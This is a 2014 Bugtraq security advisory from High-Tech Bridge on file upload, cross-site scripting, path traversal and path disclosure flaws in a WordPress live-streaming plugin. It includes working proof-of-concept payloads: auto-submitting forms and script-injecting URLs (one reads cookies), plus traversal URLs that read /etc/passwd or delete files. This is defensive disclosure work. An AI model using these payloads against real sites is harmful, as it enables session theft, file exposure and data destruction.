[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Multiple Vulnerabilities in VideoWhisper Live Streaming Integration WP Plugin
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Multiple Vulnerabilities in VideoWhisper Live Streaming Integration WP Plugin
- From: High-Tech Bridge Security Research <advisory@xxxxxxxxxxxx>
- Date: Thu, 27 Feb 2014 13:13:56 +0100 (CET)
Advisory ID: HTB23199
Product: VideoWhisper Live Streaming Integration
Vendor: VideoWhisper
Vulnerable Version(s): 4.27.3 and probably prior
Tested Version: 4.27.3
Advisory Publication: February 6, 2014 [without technical details]
Vendor Notification: February 6, 2014
Vendor Patch: February 7, 2014
Public Disclosure: February 27, 2014
Vulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434],
Cross-Site Scripting [CWE-79], Path Traversal [CWE-22], Information Exposure
Through Externally-Generated Error Message [CWE-211]
CVE References: CVE-2014-1905, CVE-2014-1906, CVE-2014-1907, CVE-2014-1908
Risk Level: Critical
CVSSv2 Base Scores: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C), 5
(AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 5
(AV:N/AC:L/Au:N/C:P/I:N/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab (
https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in
VideoWhisper Live Streaming Integration, which can be exploited to execute
arbitrary code on the target system, gain access to potentially sensitive data,
perform Cross-Site Scripting (XSS) attacks against users of vulnerable
application and delete arbitrary files.
1) Arbitrary File Upload in VideoWhisper Live Streaming Integration:
CVE-2014-1905
VideoWhisper Live Streaming Integration does not properly verify malicious file
extensions before uploading files to the server in
"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snapshots.php".
A remote attacker can upload and execute arbitrary PHP file on the target
system.
The following PoC code demonstrates exploitation of the vulnerability:
After successful exploitation the remote shell will be accessible via the
following URL:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/snapshots/1.php.jpg
Successful exploitation of this vulnerability requires that the webserver is
not configured to handle the mime-type for media files with .jpg extension.
2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration:
CVE-2014-1906
2.1 The vulnerability exists due to insufficient filtration of "m" HTTP POST
parameter in
"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php"
script. A remote attacker can send a specially crafted HTTP POST request to the
vulnerable script and permanently inject and execute arbitrary html and script
code in browser in context of the vulnerable website when user visits a page
with enabled plugin’s widget. The script will be also executed in
administrative section on the following page:
http://[host]/wp-admin/options-general.php?page=videowhisper_streaming.php&tab=live
The exploitation examples below use the "alert()" JavaScript function to
display "immuniweb" word:
<body onLoad="document.hack.submit()">
<form name="hack"
action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php";
method="post">
<input type="hidden" name="s" value="1">
<input type="hidden" name="u" value="1">
<input type="hidden" name="r" value="1">
<input type="hidden" name="m" value="<script>alert('immuniweb')</script>">
</form>
</body>
2.2 The vulnerability exists due to insufficient filtration of "msg" HTTP POST
parameter in
"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php"
script. A remote attacker can send a specially crafted HTTP POST request to the
vulnerable script and permanently inject and execute arbitrary html and script
code in browser in context of the vulnerable website when user visits the
affected page.
The exploitation examples below use the "alert()" JavaScript function to
display "immuniweb" word:
<body onLoad="document.hack.submit()">
<form name="hack"
action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatlog.php";
method="post">
<input type="hidden" name="msg" value="<script>alert('immuniweb')</script>">
<input type="hidden" name="r" value="1">
</form>
</body>
The code will be executed when the user visits the following URL:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/uploads/[room]/Log[date].html
Where [room] is set by HTTP POST parameter r and [date] is the current date.
2.3 The vulnerabilities exist due to insufficient filtration of "n" HTTP GET
parameter passed to scripts "channel.php", "htmlchat.php", "video.php" and
"videotext.php" within the
"/wp-content/plugins/videowhisper-live-streaming-integration/ls/" directory. A
remote attacker can send a specially crafted HTTP GET request to vulnerable
scripts and execute arbitrary HTML and script code in browser in context of the
vulnerable website.
The exploitation examples below use the "alert()" JavaScript function to
display "immuniweb" word:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/videotext.php?n=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
2.4 The vulnerability exists due to insufficient filtration of "message" HTTP
GET parameter passed to
"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php"
script. A remote attacker can trick a user to open a specially crafted link and
execute arbitrary HTML and script code in browser in context of the vulnerable
website.
The exploitation example below uses the "alert()" JavaScript function to
display "immuniweb" word:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_logout.php?message=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E
2.5 The vulnerability exists due to insufficient filtration of "ct" HTTP POST
parameter passed to
"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php"
script. A remote attacker can trick a logged-in user to open a specially
crafted link and execute arbitrary HTML and script code in browser in context
of the vulnerable website.
The exploitation example below uses the "alert()" JavaScript function to
display "immuniweb" word:
<body onLoad="document.hack.submit()">
<form name="hack"
action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_status.php";
method="post">
<input type="hidden" name="s" value="1">
<input type="hidden" name="r" value="1">
<input type="hidden" name="ct" value="<script>alert('immuniweb')</script>">
</form>
</body>
2.6 The vulnerability exists due to insufficient filtration of "ct" HTTP POST
parameter passed to
"/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php"
script. A remote attacker can trick a user to open a specially crafted link and
execute arbitrary HTML and script code in browser in context of the vulnerable
website.
The exploitation example below uses the "alert()" JavaScript function to
display "immuniweb" word:
<body onLoad="document.hack.submit()">
<form name="hack"
action="http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/v_status.php";
method="post">
<input type="hidden" name="s" value="1">
<input type="hidden" name="r" value="1">
<input type="hidden" name="ct" value="<script>alert('immuniweb')</script>">
</form>
</body>
3) Path Traversal in VideoWhisper Live Streaming Integration: CVE-2014-1907
3.1 The vulnerability exists due to insufficient filtration of "s" HTTP GET
parameter in
"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php"
script. A remote attacker can view contents of arbitrary files on the target
system using directory traversal sequences.
The exploitation example below displays contents of "/etc/passwd" file:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_login.php?s=../../../../../../etc/passwd
3.2 The vulnerability exists due to insufficient filtration of "s" HTTP GET
parameter in
"/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php"
script. A remote attacker can delete arbitrary files on the target system
using directory traversal sequences.
The exploitation example below deletes a file "/tmp/immuniweb":
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp_logout.php?s=../../../../../../../../tmp/immuniweb
Successful exploitation of this vulnerability requires that file
"/tmp/immuniweb" exists on the system.
4) Information Exposure Through Externally-generated Error Message in
VideoWhisper Live Streaming Integration: CVE-2014-1908
4.1 The vulnerability exists due to improper implementation of error handling
mechanisms in multiple scripts. A remote attacker can send a specially crafted
HTTP GET request to vulnerable scripts and gain knowledge of full installation
path of the application.
The following URL can be used to gain knowledge of full installation path of
the application:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/bp.php
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/videowhisper_streaming.php
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration/ls/rtmp.inc.php
-----------------------------------------------------------------------------------------------
Solution:
Update to VideoWhisper Live Streaming Integration version 4.29.5
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23089 -
https://www.htbridge.com/advisory/HTB23089 - Multiple Vulnerabilities in
VideoWhisper Live Streaming Integration Plugin for WordPress.
[2] VideoWhisper Live Streaming Integration -
http://wordpress.org/plugins/videowhisper-live-streaming-integration/ - The
VideoWhisper Live Streaming software can easily be used to add video
broadcasting features to WordPress sites and live video streams on blog pages.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ -
international in scope and free for public use, CVE® is a dictionary of
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to
developers and security practitioners, CWE is a formal list of software
weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's
proprietary web application security assessment solution with SaaS delivery
model that combines manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and
without any warranty of any kind. Details of this Advisory may be updated in
order to provide as accurate information as possible. The latest version of the
Advisory is available on web page [1] in the References.